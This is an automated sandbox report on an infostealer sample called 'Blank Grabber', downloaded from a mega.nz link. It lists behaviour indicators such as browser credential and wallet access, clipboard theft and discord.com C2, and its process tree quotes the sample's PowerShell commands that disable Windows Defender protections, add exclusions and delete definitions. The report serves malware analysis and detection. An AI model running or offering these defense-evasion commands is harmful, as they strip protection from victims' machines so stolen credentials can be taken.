Analysis
-
max time kernel
59s -
max time network
59s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
10-10-2024 03:11
Static task
static1
URLScan task
urlscan1
Behavioral task
behavioral1
Sample
https://mega.nz/file/7UZl1LTZ#WFDrHtRRmmpp6s8sbLokyA5QWN3ZHrsDla7-R0JlWMI
Resource
win10v2004-20241007-en
General
-
Target
https://mega.nz/file/7UZl1LTZ#WFDrHtRRmmpp6s8sbLokyA5QWN3ZHrsDla7-R0JlWMI
Malware Config
Signatures
-
pid Process 4348 powershell.exe 4768 powershell.exe 6008 powershell.exe 3528 powershell.exe -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts attrib.exe File opened for modification C:\Windows\System32\drivers\etc\hosts Blank Grabber.exe -
Clipboard Data 1 TTPs 2 IoCs
Adversaries may collect data stored in the clipboard from users copying information within or between applications.
pid Process 4484 cmd.exe 3880 powershell.exe -
Executes dropped EXE 3 IoCs
pid Process 1372 Blank Grabber.exe 2192 Blank Grabber.exe 4552 rar.exe -
Loads dropped DLL 17 IoCs
pid Process 2192 Blank Grabber.exe 2192 Blank Grabber.exe 2192 Blank Grabber.exe 2192 Blank Grabber.exe 2192 Blank Grabber.exe 2192 Blank Grabber.exe 2192 Blank Grabber.exe 2192 Blank Grabber.exe 2192 Blank Grabber.exe 2192 Blank Grabber.exe 2192 Blank Grabber.exe 2192 Blank Grabber.exe 2192 Blank Grabber.exe 2192 Blank Grabber.exe 2192 Blank Grabber.exe 2192 Blank Grabber.exe 2192 Blank Grabber.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow ioc 117 discord.com 118 discord.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 115 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 740 tasklist.exe 4084 tasklist.exe 5184 tasklist.exe 5908 tasklist.exe -
resource yara_rule behavioral1/files/0x000b000000023b2a-225.dat upx behavioral1/memory/2192-229-0x00007FFD1E6C0000-0x00007FFD1EB2E000-memory.dmp upx behavioral1/memory/2192-234-0x00007FFD328A0000-0x00007FFD328C4000-memory.dmp upx behavioral1/files/0x000b000000023b21-251.dat upx behavioral1/memory/2192-252-0x00007FFD37D20000-0x00007FFD37D2F000-memory.dmp upx behavioral1/files/0x000b000000023b20-250.dat upx behavioral1/files/0x000b000000023b1e-249.dat upx behavioral1/files/0x000b000000023b1d-248.dat upx behavioral1/files/0x000b000000023b1b-247.dat upx behavioral1/files/0x000c000000023b1a-246.dat upx behavioral1/files/0x000c000000023b10-245.dat upx behavioral1/files/0x000c000000023b0a-244.dat upx behavioral1/files/0x0008000000023ca0-243.dat upx behavioral1/files/0x0008000000023c9f-242.dat upx behavioral1/memory/2192-264-0x00007FFD1E540000-0x00007FFD1E6B1000-memory.dmp upx behavioral1/memory/2192-266-0x00007FFD31DF0000-0x00007FFD31E09000-memory.dmp upx behavioral1/files/0x0008000000023c9e-267.dat upx behavioral1/memory/2192-273-0x00007FFD1E480000-0x00007FFD1E538000-memory.dmp upx behavioral1/memory/2192-274-0x00007FFD1E100000-0x00007FFD1E475000-memory.dmp upx behavioral1/memory/2192-276-0x00007FFD31C50000-0x00007FFD31C7E000-memory.dmp upx behavioral1/memory/2192-281-0x00007FFD31AD0000-0x00007FFD31AE4000-memory.dmp upx behavioral1/memory/2192-284-0x00007FFD328A0000-0x00007FFD328C4000-memory.dmp upx behavioral1/memory/2192-283-0x00007FFD32210000-0x00007FFD3221D000-memory.dmp upx behavioral1/memory/2192-282-0x00007FFD1DFE0000-0x00007FFD1E0F8000-memory.dmp upx behavioral1/memory/2192-279-0x00007FFD1E6C0000-0x00007FFD1EB2E000-memory.dmp upx behavioral1/memory/2192-272-0x00007FFD36AB0000-0x00007FFD36ABD000-memory.dmp upx behavioral1/files/0x000b000000023b26-271.dat upx behavioral1/files/0x000b000000023b29-269.dat upx behavioral1/memory/2192-262-0x00007FFD31F50000-0x00007FFD31F6F000-memory.dmp upx behavioral1/memory/2192-260-0x00007FFD36750000-0x00007FFD36769000-memory.dmp upx behavioral1/memory/2192-258-0x00007FFD32110000-0x00007FFD3213D000-memory.dmp upx behavioral1/files/0x000b000000023b27-235.dat upx behavioral1/files/0x000c000000023b0d-232.dat upx behavioral1/memory/2192-464-0x00007FFD31F50000-0x00007FFD31F6F000-memory.dmp upx behavioral1/memory/2192-468-0x00007FFD1E540000-0x00007FFD1E6B1000-memory.dmp upx behavioral1/memory/2192-478-0x00007FFD31DF0000-0x00007FFD31E09000-memory.dmp upx behavioral1/memory/2192-512-0x00007FFD1E100000-0x00007FFD1E475000-memory.dmp upx behavioral1/memory/2192-511-0x00007FFD1E480000-0x00007FFD1E538000-memory.dmp upx behavioral1/memory/2192-525-0x00007FFD31C50000-0x00007FFD31C7E000-memory.dmp upx behavioral1/memory/2192-526-0x00007FFD1E6C0000-0x00007FFD1EB2E000-memory.dmp upx behavioral1/memory/2192-541-0x00007FFD1DFE0000-0x00007FFD1E0F8000-memory.dmp upx behavioral1/memory/2192-527-0x00007FFD328A0000-0x00007FFD328C4000-memory.dmp upx behavioral1/memory/2192-546-0x00007FFD1E6C0000-0x00007FFD1EB2E000-memory.dmp upx behavioral1/memory/2192-562-0x00007FFD328A0000-0x00007FFD328C4000-memory.dmp upx behavioral1/memory/2192-574-0x00007FFD1DFE0000-0x00007FFD1E0F8000-memory.dmp upx behavioral1/memory/2192-573-0x00007FFD31AD0000-0x00007FFD31AE4000-memory.dmp upx behavioral1/memory/2192-572-0x00007FFD37D20000-0x00007FFD37D2F000-memory.dmp upx behavioral1/memory/2192-571-0x00007FFD1E100000-0x00007FFD1E475000-memory.dmp upx behavioral1/memory/2192-570-0x00007FFD1E480000-0x00007FFD1E538000-memory.dmp upx behavioral1/memory/2192-569-0x00007FFD36AB0000-0x00007FFD36ABD000-memory.dmp upx behavioral1/memory/2192-568-0x00007FFD31DF0000-0x00007FFD31E09000-memory.dmp upx behavioral1/memory/2192-567-0x00007FFD1E540000-0x00007FFD1E6B1000-memory.dmp upx behavioral1/memory/2192-566-0x00007FFD31F50000-0x00007FFD31F6F000-memory.dmp upx behavioral1/memory/2192-565-0x00007FFD36750000-0x00007FFD36769000-memory.dmp upx behavioral1/memory/2192-564-0x00007FFD32110000-0x00007FFD3213D000-memory.dmp upx behavioral1/memory/2192-563-0x00007FFD31C50000-0x00007FFD31C7E000-memory.dmp upx behavioral1/memory/2192-561-0x00007FFD32210000-0x00007FFD3221D000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs
Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.
pid Process 1820 cmd.exe 1896 netsh.exe -
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
pid Process 1584 WMIC.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 5220 systeminfo.exe -
Kills process with taskkill 16 IoCs
pid Process 5524 taskkill.exe 5720 taskkill.exe 5608 taskkill.exe 5760 taskkill.exe 5424 taskkill.exe 2032 taskkill.exe 5804 taskkill.exe 5780 taskkill.exe 5892 taskkill.exe 3376 taskkill.exe 408 taskkill.exe 5480 taskkill.exe 5288 taskkill.exe 5376 taskkill.exe 5652 taskkill.exe 5976 taskkill.exe -
Modifies data under HKEY_USERS 3 IoCs
description ioc Process Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133730035357998140" chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe -
Suspicious behavior: EnumeratesProcesses 28 IoCs
pid Process 4064 chrome.exe 4064 chrome.exe 4348 powershell.exe 4348 powershell.exe 4348 powershell.exe 3528 powershell.exe 3528 powershell.exe 3528 powershell.exe 3880 powershell.exe 3880 powershell.exe 3880 powershell.exe 5472 powershell.exe 5472 powershell.exe 5472 powershell.exe 4768 powershell.exe 4768 powershell.exe 4768 powershell.exe 4040 powershell.exe 4040 powershell.exe 4040 powershell.exe 5212 chrome.exe 5212 chrome.exe 6008 powershell.exe 6008 powershell.exe 6008 powershell.exe 3520 powershell.exe 3520 powershell.exe 3520 powershell.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
pid Process 4064 chrome.exe 4064 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: 33 4580 AUDIODG.EXE Token: SeIncBasePriorityPrivilege 4580 AUDIODG.EXE Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe Token: SeShutdownPrivilege 4064 chrome.exe Token: SeCreatePagefilePrivilege 4064 chrome.exe -
Suspicious use of FindShellTrayWindow 60 IoCs
pid Process 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe -
Suspicious use of SendNotifyMessage 48 IoCs
pid Process 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 4064 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe 5212 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4064 wrote to memory of 4780 4064 chrome.exe 83 PID 4064 wrote to memory of 4780 4064 chrome.exe 83 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 3556 4064 chrome.exe 85 PID 4064 wrote to memory of 2832 4064 chrome.exe 86 PID 4064 wrote to memory of 2832 4064 chrome.exe 86 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 PID 4064 wrote to memory of 3884 4064 chrome.exe 87 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 5680 attrib.exe 5800 attrib.exe
Processes
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://mega.nz/file/7UZl1LTZ#WFDrHtRRmmpp6s8sbLokyA5QWN3ZHrsDla7-R0JlWMI1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffd22b0cc40,0x7ffd22b0cc4c,0x7ffd22b0cc582⤵PID:4780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1776,i,5698089091141537426,11548417465727555007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:22⤵PID:3556
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2136,i,5698089091141537426,11548417465727555007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2184 /prefetch:32⤵PID:2832
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2236,i,5698089091141537426,11548417465727555007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2552 /prefetch:82⤵PID:3884
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3148,i,5698089091141537426,11548417465727555007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3140 /prefetch:12⤵PID:856
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3120,i,5698089091141537426,11548417465727555007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:12⤵PID:3632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4900,i,5698089091141537426,11548417465727555007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4908 /prefetch:82⤵PID:2240
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4912,i,5698089091141537426,11548417465727555007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4908 /prefetch:82⤵PID:2492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5316,i,5698089091141537426,11548417465727555007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5340 /prefetch:82⤵PID:3016
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5296,i,5698089091141537426,11548417465727555007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5500 /prefetch:82⤵PID:2192
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5360,i,5698089091141537426,11548417465727555007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5524 /prefetch:82⤵PID:436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5680,i,5698089091141537426,11548417465727555007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5824 /prefetch:82⤵PID:2900
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5692,i,5698089091141537426,11548417465727555007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5848 /prefetch:82⤵PID:4532
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5616,i,5698089091141537426,11548417465727555007,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5624 /prefetch:82⤵PID:1820
-
-
C:\Users\Admin\Downloads\Blank Grabber.exe"C:\Users\Admin\Downloads\Blank Grabber.exe"2⤵
- Executes dropped EXE
PID:1372 -
C:\Users\Admin\Downloads\Blank Grabber.exe"C:\Users\Admin\Downloads\Blank Grabber.exe"3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
PID:2192 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Blank Grabber.exe'"4⤵PID:1444
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\Downloads\Blank Grabber.exe'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3528
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"4⤵PID:828
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4348
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:2760
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:740
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:3796
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:4084
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"4⤵PID:4880
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName5⤵PID:2072
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"4⤵
- Clipboard Data
PID:4484 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard5⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:3880
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"4⤵PID:436
-
C:\Windows\system32\tasklist.exetasklist /FO LIST5⤵
- Enumerates processes with tasklist
PID:5184
-
-
-
